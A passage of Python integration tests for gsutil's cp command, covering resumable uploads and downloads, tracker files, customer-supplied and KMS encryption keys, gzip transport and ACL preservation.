test_callback_file = self.CreateTempFile(contents=pickle.dumps(
_ResumableUploadRetryHandler(
5, apitools_exceptions.BadStatusCodeError, ('unused', 'unused',
'unused'))))
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'-D', 'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
return_stderr=1)
if self.test_api == ApiSelector.XML:
self.assertIn('Got retryable failure', stderr)
else:
self.assertIn('Retrying', stderr)
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_streaming_upload_retry(self):
"""Tests that a streaming resumable upload completes with one retry."""
if self.test_api == ApiSelector.XML:
return unittest.skip('XML does not support resumable streaming uploads.')
bucket_uri = self.CreateBucket()
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
_ResumableUploadRetryHandler(5, apitools_exceptions.BadStatusCodeError,
('unused', 'unused', 'unused'))))
# Need to reduce the JSON chunk size since streaming uploads buffer a
# full chunk.
boto_configs_for_test = [('GSUtil', 'json_resumable_chunk_size',
str(256 * ONE_KIB)), ('Boto', 'num_retries', '2')]
with SetBotoConfigForTest(boto_configs_for_test):
stderr = self.RunGsUtil([
'-D', 'cp', '--testcallbackfile', test_callback_file, '-',
suri(bucket_uri, 'foo')
],
stdin='a' * 512 * ONE_KIB,
return_stderr=1)
self.assertIn('Retrying', stderr)
@SkipForS3('preserve_acl flag not supported for S3.')
def test_cp_preserve_no_owner(self):
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'foo')
# Anonymous user can read the object and write to the bucket, but does
# not own the object.
self.RunGsUtil(['acl', 'ch', '-u', 'AllUsers:R', suri(object_uri)])
self.RunGsUtil(['acl', 'ch', '-u', 'AllUsers:W', suri(bucket_uri)])
with self.SetAnonymousBotoCreds():
stderr = self.RunGsUtil(
['cp', '-p', suri(object_uri),
suri(bucket_uri, 'foo')],
return_stderr=True,
expected_status=1)
self.assertIn('OWNER permission is required for preserving ACLs', stderr)
@SkipForS3('No resumable upload support for S3.')
def test_cp_progress_callbacks(self):
bucket_uri = self.CreateBucket()
final_size_string = BytesToFixedWidthString(1024**2)
final_progress_callback = final_size_string + '/' + final_size_string
fpath = self.CreateTempFile(contents=b'a' * ONE_MIB, file_name='foo')
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
return_stderr=True)
self.assertEquals(1, stderr.count(final_progress_callback))
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(2 * ONE_MIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
return_stderr=True)
self.assertEquals(1, stderr.count(final_progress_callback))
stderr = self.RunGsUtil(['cp', suri(bucket_uri, 'foo'), fpath],
return_stderr=True)
self.assertEquals(1, stderr.count(final_progress_callback))
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload(self):
"""Tests that a basic resumable upload completes successfully."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'a' * self.halt_size)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
self.RunGsUtil(['cp', fpath, suri(bucket_uri)])
@SkipForS3('No resumable upload support for S3.')
def test_resumable_upload_break_leaves_tracker(self):
"""Tests that a tracker file is created with a resumable upload."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(file_name='foo', contents=b'a' * self.halt_size)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
tracker_filename = GetTrackerFilePath(
StorageUrlFromString(suri(bucket_uri, 'foo')), TrackerFileType.UPLOAD,
self.test_api)
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
try:
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri, 'foo')
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
self.assertTrue(os.path.exists(tracker_filename),
'Tracker file %s not present.' % tracker_filename)
# Test the permissions
if os.name == 'posix':
mode = oct(stat.S_IMODE(os.stat(tracker_filename).st_mode))
# Assert that only user has read/write permission
self.assertEqual(oct(0o600), mode)
finally:
DeleteTrackerFile(tracker_filename)
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_break_file_size_change(self):
"""Tests a resumable upload where the uploaded file changes size.
This should fail when we read the tracker data.
"""
bucket_uri = self.CreateBucket()
tmp_dir = self.CreateTempDir()
fpath = self.CreateTempFile(file_name='foo',
tmpdir=tmp_dir,
contents=b'a' * self.halt_size)
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
fpath = self.CreateTempFile(file_name='foo',
tmpdir=tmp_dir,
contents=b'a' * self.halt_size * 2)
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
expected_status=1,
return_stderr=True)
self.assertIn('ResumableUploadAbortException', stderr)
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_break_file_content_change(self):
"""Tests a resumable upload where the uploaded file changes content."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'XML doesn\'t make separate HTTP calls at fixed-size boundaries for '
'resumable uploads, so we can\'t guarantee that the server saves a '
'specific part of the upload.')
bucket_uri = self.CreateBucket()
tmp_dir = self.CreateTempDir()
fpath = self.CreateTempFile(file_name='foo',
tmpdir=tmp_dir,
contents=b'a' * ONE_KIB * ONE_KIB)
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
HaltingCopyCallbackHandler(True,
int(ONE_KIB) * 512)))
resumable_threshold_for_test = ('GSUtil', 'resumable_threshold',
str(ONE_KIB))
resumable_chunk_size_for_test = ('GSUtil', 'json_resumable_chunk_size',
str(ONE_KIB * 256))
with SetBotoConfigForTest(
[resumable_threshold_for_test, resumable_chunk_size_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
fpath = self.CreateTempFile(file_name='foo',
tmpdir=tmp_dir,
contents=b'b' * ONE_KIB * ONE_KIB)
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
expected_status=1,
return_stderr=True)
self.assertIn('doesn\'t match cloud-supplied digest', stderr)
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_break_file_smaller_size(self):
"""Tests a resumable upload where the uploaded file changes content.
This should fail hash validation.
"""
bucket_uri = self.CreateBucket()
tmp_dir = self.CreateTempDir()
fpath = self.CreateTempFile(file_name='foo',
tmpdir=tmp_dir,
contents=b'a' * ONE_KIB * ONE_KIB)
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
HaltingCopyCallbackHandler(True,
int(ONE_KIB) * 512)))
resumable_threshold_for_test = ('GSUtil', 'resumable_threshold',
str(ONE_KIB))
resumable_chunk_size_for_test = ('GSUtil', 'json_resumable_chunk_size',
str(ONE_KIB * 256))
with SetBotoConfigForTest(
[resumable_threshold_for_test, resumable_chunk_size_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
fpath = self.CreateTempFile(file_name='foo',
tmpdir=tmp_dir,
contents=b'a' * ONE_KIB)
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
expected_status=1,
return_stderr=True)
self.assertIn('ResumableUploadAbortException', stderr)
@SkipForS3('No resumable upload support for S3.')
def test_cp_composite_encrypted_upload_resume(self):
"""Tests that an encrypted composite upload resumes successfully."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
dst_url = StorageUrlFromString(suri(bucket_uri, 'foo'))
file_contents = b'foobar'
file_name = 'foobar'
source_file = self.CreateTempFile(contents=file_contents,
file_name=file_name)
src_url = StorageUrlFromString(source_file)
# Simulate an upload that had occurred by writing a tracker file
# that points to a previously uploaded component.
tracker_file_name = GetTrackerFilePath(dst_url,
TrackerFileType.PARALLEL_UPLOAD,
self.test_api, src_url)
tracker_prefix = '123'
# Create component 0 to be used in the resume; it must match the name
# that will be generated in copy_helper, so we use the same scheme.
encoded_name = (PARALLEL_UPLOAD_STATIC_SALT + source_file).encode(UTF8)
content_md5 = GetMd5()
content_md5.update(encoded_name)
digest = content_md5.hexdigest()
component_object_name = (tracker_prefix + PARALLEL_UPLOAD_TEMP_NAMESPACE +
digest + '_0')
component_size = 3
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name=component_object_name,
contents=file_contents[:component_size],
encryption_key=TEST_ENCRYPTION_KEY1)
existing_component = ObjectFromTracker(component_object_name,
str(object_uri.generation))
existing_components = [existing_component]
enc_key_sha256 = TEST_ENCRYPTION_KEY1_SHA256_B64
WriteParallelUploadTrackerFile(tracker_file_name,
tracker_prefix,
existing_components,
encryption_key_sha256=enc_key_sha256)
try:
# Now "resume" the upload using the original encryption key.
with SetBotoConfigForTest([
('GSUtil', 'parallel_composite_upload_threshold', '1'),
('GSUtil', 'parallel_composite_upload_component_size',
str(component_size)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)
]):
stderr = self.RunGsUtil(
['cp', source_file, suri(bucket_uri, 'foo')], return_stderr=True)
self.assertIn('Found 1 existing temporary components to reuse.', stderr)
self.assertFalse(
os.path.exists(tracker_file_name),
'Tracker file %s should have been deleted.' % tracker_file_name)
read_contents = self.RunGsUtil(['cat', suri(bucket_uri, 'foo')],
return_stdout=True)
self.assertEqual(read_contents.encode('ascii'), file_contents)
finally:
# Clean up if something went wrong.
DeleteTrackerFile(tracker_file_name)
@SkipForS3('No resumable upload support for S3.')
def test_cp_composite_encrypted_upload_restart(self):
"""Tests that encrypted composite upload restarts given a different key."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
dst_url = StorageUrlFromString(suri(bucket_uri, 'foo'))
file_contents = b'foobar'
source_file = self.CreateTempFile(contents=file_contents, file_name='foo')
src_url = StorageUrlFromString(source_file)
# Simulate an upload that had occurred by writing a tracker file.
tracker_file_name = GetTrackerFilePath(dst_url,
TrackerFileType.PARALLEL_UPLOAD,
self.test_api, src_url)
tracker_prefix = '123'
existing_component_name = 'foo_1'
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo_1',
contents=b'foo',
encryption_key=TEST_ENCRYPTION_KEY1)
existing_component = ObjectFromTracker(existing_component_name,
str(object_uri.generation))
existing_components = [existing_component]
enc_key_sha256 = TEST_ENCRYPTION_KEY1_SHA256_B64
WriteParallelUploadTrackerFile(tracker_file_name, tracker_prefix,
existing_components,
enc_key_sha256.decode('ascii'))
try:
# Now "resume" the upload using the original encryption key.
with SetBotoConfigForTest([
('GSUtil', 'parallel_composite_upload_threshold', '1'),
('GSUtil', 'parallel_composite_upload_component_size', '3'),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY2)
]):
stderr = self.RunGsUtil(
['cp', source_file, suri(bucket_uri, 'foo')], return_stderr=True)
self.assertIn(
'does not match current encryption key. '
'Deleting old components and restarting upload', stderr)
self.assertNotIn('existing temporary components to reuse.', stderr)
self.assertFalse(
os.path.exists(tracker_file_name),
'Tracker file %s should have been deleted.' % tracker_file_name)
read_contents = self.RunGsUtil(['cat', suri(bucket_uri, 'foo')],
return_stdout=True)
self.assertEqual(read_contents.encode('ascii'), file_contents)
finally:
# Clean up if something went wrong.
DeleteTrackerFile(tracker_file_name)
@SkipForS3('Test uses gs-specific KMS encryption')
def test_kms_key_correctly_applied_to_composite_upload(self):
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'abcd')
obj_suri = suri(bucket_uri, 'composed')
key_fqn = self.authorize_project_to_use_testing_kms_key()
with SetBotoConfigForTest([
('GSUtil', 'encryption_key', key_fqn),
('GSUtil', 'parallel_composite_upload_threshold', '1'),
('GSUtil', 'parallel_composite_upload_component_size', '1')
]):
self.RunGsUtil(['cp', fpath, obj_suri])
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
self.AssertObjectUsesCMEK(obj_suri, key_fqn)
# This temporarily changes the tracker directory to unwritable which
# interferes with any parallel running tests that use the tracker directory.
@NotParallelizable
@SkipForS3('No resumable upload support for S3.')
@unittest.skipIf(IS_WINDOWS, 'chmod on dir unsupported on Windows.')
@SequentialAndParallelTransfer
def test_cp_unwritable_tracker_file(self):
"""Tests a resumable upload with an unwritable tracker file."""
bucket_uri = self.CreateBucket()
tracker_filename = GetTrackerFilePath(
StorageUrlFromString(suri(bucket_uri, 'foo')), TrackerFileType.UPLOAD,
self.test_api)
tracker_dir = os.path.dirname(tracker_filename)
fpath = self.CreateTempFile(file_name='foo', contents=b'a' * ONE_KIB)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
save_mod = os.stat(tracker_dir).st_mode
try:
os.chmod(tracker_dir, 0)
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
expected_status=1,
return_stderr=True)
self.assertIn('Couldn\'t write tracker file', stderr)
finally:
os.chmod(tracker_dir, save_mod)
if os.path.exists(tracker_filename):
os.unlink(tracker_filename)
# This temporarily changes the tracker directory to unwritable which
# interferes with any parallel running tests that use the tracker directory.
@NotParallelizable
@unittest.skipIf(IS_WINDOWS, 'chmod on dir unsupported on Windows.')
@SequentialAndParallelTransfer
def test_cp_unwritable_tracker_file_download(self):
"""Tests downloads with an unwritable tracker file."""
object_uri = self.CreateObject(contents=b'foo' * ONE_KIB)
tracker_filename = GetTrackerFilePath(
StorageUrlFromString(suri(object_uri)), TrackerFileType.DOWNLOAD,
self.test_api)
tracker_dir = os.path.dirname(tracker_filename)
fpath = self.CreateTempFile()
save_mod = os.stat(tracker_dir).st_mode
try:
os.chmod(tracker_dir, 0)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(EIGHT_MIB))
with SetBotoConfigForTest([boto_config_for_test]):
# Should succeed because we are below the threshold.
self.RunGsUtil(['cp', suri(object_uri), fpath])
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
expected_status=1,
return_stderr=True)
self.assertIn('Couldn\'t write tracker file', stderr)
finally:
os.chmod(tracker_dir, save_mod)
if os.path.exists(tracker_filename):
os.unlink(tracker_filename)
def _test_cp_resumable_download_break_helper(self,
boto_config,
encryption_key=None):
"""Helper function for different modes of resumable download break.
Args:
boto_config: List of boto configuration tuples for use with
SetBotoConfigForTest.
encryption_key: Base64 encryption key for object encryption (if any).
"""
bucket_uri = self.CreateBucket()
file_contents = b'a' * self.halt_size
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=file_contents,
encryption_key=encryption_key)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
with SetBotoConfigForTest(boto_config):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri), fpath
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting download.', stderr)
tracker_filename = GetTrackerFilePath(StorageUrlFromString(fpath),
TrackerFileType.DOWNLOAD,
self.test_api)
self.assertTrue(os.path.isfile(tracker_filename))
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Resuming download', stderr)
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), file_contents, 'File contents differ')
def test_cp_resumable_download_break(self):
"""Tests that a download can be resumed after a connection break."""
self._test_cp_resumable_download_break_helper([
('GSUtil', 'resumable_threshold', str(ONE_KIB))
])
@SkipForS3('gsutil doesn\'t support S3 customer-supplied encryption keys.')
def test_cp_resumable_encrypted_download_break(self):
"""Tests that an encrypted download resumes after a connection break."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
self._test_cp_resumable_download_break_helper(
[('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)],
encryption_key=TEST_ENCRYPTION_KEY1)
@SkipForS3('gsutil doesn\'t support S3 customer-supplied encryption keys.')
def test_cp_resumable_encrypted_download_key_rotation(self):
"""Tests that a download restarts with a rotated encryption key."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
file_contents = b'a' * self.halt_size
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=file_contents,
encryption_key=TEST_ENCRYPTION_KEY1)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri), fpath
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting download.', stderr)
tracker_filename = GetTrackerFilePath(StorageUrlFromString(fpath),
TrackerFileType.DOWNLOAD,
self.test_api)
self.assertTrue(os.path.isfile(tracker_filename))
# After simulated connection break, rotate the key on the object.
boto_config_for_test2 = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'decryption_key1',
TEST_ENCRYPTION_KEY1),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY2)]
with SetBotoConfigForTest(boto_config_for_test2):
self.RunGsUtil(['rewrite', '-k', suri(object_uri)])
# Now resume the download using only the new encryption key. Since its
# generation changed, we must restart it.
boto_config_for_test3 = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY2)]
with SetBotoConfigForTest(boto_config_for_test3):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Restarting download', stderr)
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), file_contents, 'File contents differ')
@SequentialAndParallelTransfer
def test_cp_resumable_download_etag_differs(self):
"""Tests that download restarts the file when the source object changes.
This causes the etag not to match.
"""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abc' * self.halt_size)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
# This will create a tracker file with an ETag.
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri), fpath
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting download.', stderr)
# Create a new object with different contents - it should have a
# different ETag since the content has changed.
object_uri = self.CreateObject(
bucket_uri=bucket_uri,
object_name='foo',
contents=b'b' * self.halt_size,
gs_idempotent_generation=object_uri.generation)
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertNotIn('Resuming download', stderr)
# TODO: Enable this test for sequential downloads when their tracker files are
# modified to contain the source object generation.
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_resumable_download_generation_differs(self):
"""Tests that a resumable download restarts if the generation differs."""
bucket_uri = self.CreateBucket()
file_contents = b'abcd' * self.halt_size
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=file_contents)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_max_components', '3')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('Artifically halting download.', stderr)
# Overwrite the object with an identical object, increasing
# the generation but leaving other metadata the same.
identical_file = self.CreateTempFile(contents=file_contents)
self.RunGsUtil(['cp', suri(identical_file), suri(object_uri)])
stderr = self.RunGsUtil(
['cp', suri(object_uri), suri(fpath)], return_stderr=True)
self.assertIn('Restarting download from scratch', stderr)
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), file_contents, 'File contents differ')
def test_cp_resumable_download_file_larger(self):
"""Tests download deletes the tracker file when existing file is larger."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'a' * self.halt_size)
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri), fpath
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting download.', stderr)
with open(fpath + '_.gstmp', 'w') as larger_file:
for _ in range(self.halt_size * 2):
larger_file.write('a')
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
expected_status=1,
return_stderr=True)
self.assertNotIn('Resuming download', stderr)
self.assertIn('Deleting tracker file', stderr)
def test_cp_resumable_download_content_differs(self):
"""Tests that we do not re-download when tracker file matches existing file.
We only compare size, not contents, so re-download should not occur even
though the contents are technically different. However, hash validation on
the file should still occur and we will delete the file then because
the hashes differ.
"""
bucket_uri = self.CreateBucket()
tmp_dir = self.CreateTempDir()
fpath = self.CreateTempFile(tmpdir=tmp_dir)
temp_download_file = fpath + '_.gstmp'
with open(temp_download_file, 'w') as fp:
fp.write('abcd' * ONE_KIB)
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'efgh' * ONE_KIB)
stdout = self.RunGsUtil(['ls', '-L', suri(object_uri)], return_stdout=True)
etag_match = re.search(r'\s*ETag:\s*(.*)', stdout)
self.assertIsNotNone(etag_match, 'Could not get object ETag')
self.assertEqual(len(etag_match.groups()), 1,
'Did not match expected single ETag')
etag = etag_match.group(1)
tracker_filename = GetTrackerFilePath(StorageUrlFromString(fpath),
TrackerFileType.DOWNLOAD,
self.test_api)
try:
with open(tracker_filename, 'w') as tracker_fp:
tracker_fp.write(etag)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True,
expected_status=1)
self.assertIn('Download already complete', stderr)
self.assertIn('doesn\'t match cloud-supplied digest', stderr)
# File and tracker file should be deleted.
self.assertFalse(os.path.isfile(temp_download_file))
self.assertFalse(os.path.isfile(tracker_filename))
# Permanent file should not have been created.
self.assertFalse(os.path.isfile(fpath))
finally:
if os.path.exists(tracker_filename):
os.unlink(tracker_filename)
def test_cp_resumable_download_content_matches(self):
"""Tests download no-ops when tracker file matches existing file."""
bucket_uri = self.CreateBucket()
tmp_dir = self.CreateTempDir()
fpath = self.CreateTempFile(tmpdir=tmp_dir)
matching_contents = b'abcd' * ONE_KIB
temp_download_file = fpath + '_.gstmp'
with open(temp_download_file, 'wb') as fp:
fp.write(matching_contents)
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=matching_contents)
stdout = self.RunGsUtil(['ls', '-L', suri(object_uri)], return_stdout=True)
etag_match = re.search(r'\s*ETag:\s*(.*)', stdout)
self.assertIsNotNone(etag_match, 'Could not get object ETag')
self.assertEqual(len(etag_match.groups()), 1,
'Did not match expected single ETag')
etag = etag_match.group(1)
tracker_filename = GetTrackerFilePath(StorageUrlFromString(fpath),
TrackerFileType.DOWNLOAD,
self.test_api)
with open(tracker_filename, 'w') as tracker_fp:
tracker_fp.write(etag)
try:
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Download already complete', stderr)
# Tracker file should be removed after successful hash validation.
self.assertFalse(os.path.isfile(tracker_filename))
finally:
if os.path.exists(tracker_filename):
os.unlink(tracker_filename)
def test_cp_resumable_download_tracker_file_not_matches(self):
"""Tests that download overwrites when tracker file etag does not match."""
bucket_uri = self.CreateBucket()
tmp_dir = self.CreateTempDir()
fpath = self.CreateTempFile(tmpdir=tmp_dir, contents=b'abcd' * ONE_KIB)
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'efgh' * ONE_KIB)
stdout = self.RunGsUtil(['ls', '-L', suri(object_uri)], return_stdout=True)
etag_match = re.search(r'\s*ETag:\s*(.*)', stdout)
self.assertIsNotNone(etag_match, 'Could not get object ETag')
self.assertEqual(len(etag_match.groups()), 1,
'Did not match regex for exactly one object ETag')
etag = etag_match.group(1)
etag += 'nonmatching'
tracker_filename = GetTrackerFilePath(StorageUrlFromString(fpath),
TrackerFileType.DOWNLOAD,
self.test_api)
with open(tracker_filename, 'w') as tracker_fp:
tracker_fp.write(etag)
try:
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertNotIn('Resuming download', stderr)
# Ensure the file was overwritten.
with open(fpath, 'r') as in_fp:
contents = in_fp.read()
self.assertEqual(
contents, 'efgh' * ONE_KIB,
'File not overwritten when it should have been '
'due to a non-matching tracker file.')
self.assertFalse(os.path.isfile(tracker_filename))
finally:
if os.path.exists(tracker_filename):
os.unlink(tracker_filename)
def test_cp_double_gzip(self):
"""Tests that upload and download of a doubly-gzipped file succeeds."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(file_name='looks-zipped.gz', contents=b'foo')
self.RunGsUtil([
'-h', 'content-type:application/gzip', 'cp', '-Z',
suri(fpath),
suri(bucket_uri, 'foo')
])
self.RunGsUtil(['cp', suri(bucket_uri, 'foo'), fpath])
@SkipForS3('No compressed transport encoding support for S3.')
@SkipForXML('No compressed transport encoding support for the XML API.')
@SequentialAndParallelTransfer
def test_cp_double_gzip_transport_encoded(self):
"""Tests that upload and download of a doubly-gzipped file succeeds."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(file_name='looks-zipped.gz', contents=b'foo')
stderr = self.RunGsUtil([
'-D', '-h', 'content-type:application/gzip', 'cp', '-J',
suri(fpath),
suri(bucket_uri, 'foo')
],
return_stderr=True)
# Ensure the progress logger sees a gzip encoding.
self.assertIn('send: Using gzip transport encoding for the request.',
stderr)
self.RunGsUtil(['cp', suri(bucket_uri, 'foo'), fpath])
@SequentialAndParallelTransfer
def test_cp_resumable_download_gzip(self):
"""Tests that download can be resumed successfully with a gzipped file."""
# Generate some reasonably incompressible data. This compresses to a bit
# around 128K in practice, but we assert specifically below that it is
# larger than self.halt_size to guarantee that we can halt the download
# partway through.
object_uri = self.CreateObject()
random.seed(0)
contents = str([
random.choice(string.ascii_letters) for _ in xrange(self.halt_size)
]).encode('ascii')
random.seed() # Reset the seed for any other tests.
fpath1 = self.CreateTempFile(file_name='unzipped.txt', contents=contents)
self.RunGsUtil(['cp', '-z', 'txt', suri(fpath1), suri(object_uri)])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _GetObjectSize():
stdout = self.RunGsUtil(['du', suri(object_uri)], return_stdout=True)
size_match = re.search(r'(\d+)\s+.*', stdout)
self.assertIsNotNone(size_match, 'Could not get object size')
self.assertEqual(len(size_match.groups()), 1,
'Did not match regex for exactly one object size.')
return long(size_match.group(1))
object_size = _GetObjectSize()
self.assertGreaterEqual(
object_size, self.halt_size,
'Compresed object size was not large enough to '
'allow for a halted download, so the test results '
'would be invalid. Please increase the compressed '
'object size in the test.')
fpath2 = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath2)
],
return_stderr=True,
expected_status=1)
self.assertIn('Artifically halting download.', stderr)
self.assertIn('Downloading to temp gzip filename', stderr)
# Tracker files will have different names depending on if we are
# downloading sequentially or in parallel.
sliced_download_threshold = HumanReadableToBytes(
boto.config.get('GSUtil', 'sliced_object_download_threshold',
DEFAULT_SLICED_OBJECT_DOWNLOAD_THRESHOLD))
sliced_download = (len(contents) > sliced_download_threshold and
sliced_download_threshold > 0 and
UsingCrcmodExtension())
if sliced_download:
